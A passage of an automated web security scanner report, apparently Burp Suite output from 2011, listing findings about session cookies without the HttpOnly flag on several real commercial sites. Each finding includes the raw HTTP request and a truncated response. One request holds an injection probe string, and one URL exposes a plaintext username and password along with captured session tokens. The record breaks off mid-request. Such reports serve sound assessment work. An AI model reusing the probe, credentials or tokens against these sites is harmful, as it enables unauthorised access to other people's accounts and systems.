14.5. https://ecommerce.randomhouse.com/sign-in.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sign-in.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=check#true#1303855733|session#1303855598284-166145#1303857533|PC#1303855598284-166145#1366927673; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:18:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=A35B965C00D29FC0BBB2802EC939085E.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16763


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

14.6. http://kbportal.thomson.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO, PSA, OUR
Location: /display/2/login.aspx?cpid=21&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.426698744297028&searchstring=&searchtype=
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pgjffeamcy0qmo55shtmhjrj; path=/
Set-Cookie: LangCode=en-US; expires=Thu, 26-May-2011 20:04:25 GMT; path=/
Set-Cookie: LangId=1; expires=Thu, 26-May-2011 20:04:25 GMT; path=/
Set-Cookie: PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 339
Set-Cookie: BIGipServerKB-80=2240234663.20480.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/display/2/login.aspx?cpid=21&amp;username=CSO&amp;password=CSO&amp;c=12&amp;cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&
...[SNIP]...

14.7. http://kbportal.thomson.com/index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO, PSA, OUR
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvjbtd3djaw1wd55elx1ml45; path=/
Set-Cookie: LangCode=en-US; expires=Thu, 26-May-2011 20:59:42 GMT; path=/
Set-Cookie: LangId=1; expires=Thu, 26-May-2011 20:59:42 GMT; path=/
Cache-Control: private
Content-Length: 0
Set-Cookie: BIGipServerKB-80=428295335.20480.0000; path=/


14.8. http://kbportal.thomson.com/utility/getResource.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /utility/getResource.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utility/getResource.aspx?f=logo_24'"-- HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 11:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=4t5xvc55nwejkaucfhy5p445; path=/
Cache-Control: private
Content-Length: 0
Set-Cookie: BIGipServerKB-80=2240234663.20480.0000; path=/


14.9. http://knowledgebase.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://knowledgebase.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: knowledgebase.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 20:56:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.moxiesoft.com/tal_products/knowledgebase.aspx
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBDSRQR=JKJDGGADIAPLNMDLDELPMJEC; path=/
Cache-control: private


14.10. http://moxieinsight.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://moxieinsight.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:03:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://moxieinsight.com/moxieinsight/xmlrpc.php
Link: <http://moxieinsight.com?p=5>; rel=shortlink
Set-Cookie: PHPSESSID=7723dec4a574188b7395e7c0bfa68dd2; path=/
Content-Length: 26203
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Moxie Insight - Home<
...[SNIP]...

14.11. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=ACCT40535&n=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: shopping.netsuite.com
Pragma: no-cache
Cookie: NLVisitorId=rcHW8495AYYmDimX; NLShopperId=rcHW8495AZUmDi8g; __utma=1.1416409993.1303741619.1303741619.1303741619.1; __utmz=1.1303741619.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1133521966:73686F702D6A6176613031302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=PzH9N38cyJNT1wFtK2cSy2Hj1s50GkS3MRk43TWLf8pXZYN2twVhc7PhlPxQJx9BRD14VQp1PzKtYfYxvWM6s2Tvy1g0dZ2ZKPnBP01ng1hgMM3bsct5wGQXrpjj5d6C!-1418288228; path=/
Set-Cookie: NLShopperId=rcHW8495AZUmDi8g; domain=shopping.netsuite.com; expires=Tuesday, 03-May-2011 21:41:48 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 17540


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>WELCOME - Core, LLC</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...

14.12. http://support.moxiesoft.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...

14.13. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.criticalwatch.com/vulnerability-management.aspx&i=12408 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Eabaca%2Ecom%2F

Response

HTTP/1.1 302 Object moved
Date: Tue, 26 Apr 2011 21:48:57 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; expires=Wed, 27-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSARASQCS=BNMAOHFDGGOHNPCDNOANJMJC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

14.14. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...

14.15. http://www.bcbst.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bcbst.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 35610
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSADSTDQ=NIJBMDCDEMGENIAGHJCEJEJC; path=/
Set-Cookie: TLTSID=52C4235646B6CCC2C2C1DEB94AFC18A3; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=52C4235646B6CCC2C2C1DEB94AFC18A3; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:37:00 GMT
Date: Tue, 26 Apr 2011 20:36:59 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 35610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

14.16. https://www.bcbst.com/accounttools/public/askUserId.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /accounttools/public/askUserId.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 20:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000JjcWGgqTGgodjkS-3rChz2B:148u7u772; Path=/
Server: WebSphere Application Server/6.1
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b;path=/;secure;httponly
Content-Length: 25749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


        <html>
<head>
<title>Account Management - BCBST.com</title>
<meta name="page title" content="A
...[SNIP]...

14.17. https://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /inc/loginform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/login.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:26:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD; path=/
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">
   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...

14.18. https://www.bcbst.com/secure/public/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /secure/public/login.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/public/login.asp HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/InvalidAccess.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29752
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=JCKBMDCDBIIALLOMEMBMLDPK; path=/
Cache-control: private
Content-Length: 29752


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>BlueAccess - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content=""/>
<meta n
...[SNIP]...

14.19. http://www.cargill.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cargill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=00006oiZrst88aPT_nKV9PJddzZ:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 27401

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" c
...[SNIP]...

14.20. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...

14.21. http://www.freemanco.com/freemanco/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /freemanco/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freemanco/ HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
